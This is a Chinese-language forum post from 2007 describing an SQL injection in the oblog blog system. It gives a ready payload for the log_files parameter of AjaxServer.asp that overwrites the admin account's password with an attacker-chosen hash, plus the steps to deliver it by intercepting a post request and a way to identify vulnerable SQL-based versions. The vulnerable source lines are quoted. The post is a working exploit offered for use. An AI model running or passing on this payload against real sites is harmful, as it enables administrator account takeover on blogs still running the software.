- 听众
- 收听
- 积分
- 3268
- 主题
- 回帖
- 0
- 精华
注册时间2007-9-13
最后登录1970-1-1
该用户从未签到
|
首先找到使用sql版本的系统注册用户test,发表新日志,同时抓包,修改log_files。2);update/**/oblog_user/**/set/**/password= 7a57a5a743894a0e/**/where/**/username=admin;--
关于怎么区别sql和access的版本,目前也没发现好的方法,但是可以通过查看ver.asp文件看到当前版本号。某些版本好象没这文件。官方好象也出补丁了...很多blog网站都是用的sql的版本..........
漏洞文件:AjaxServer.asp
语句:log_files=Replace(log_files," ","")
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'附加文件处理
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid=" & tid & " Where fileid In (" & log_files & ")"
End if
'Tag处理
变量:log_files................... |
|
IP卡
狗仔卡
发表于 2007-12-17 18:31:24
提升卡
置顶卡
喧嚣卡
变色卡
抢沙发
显身卡
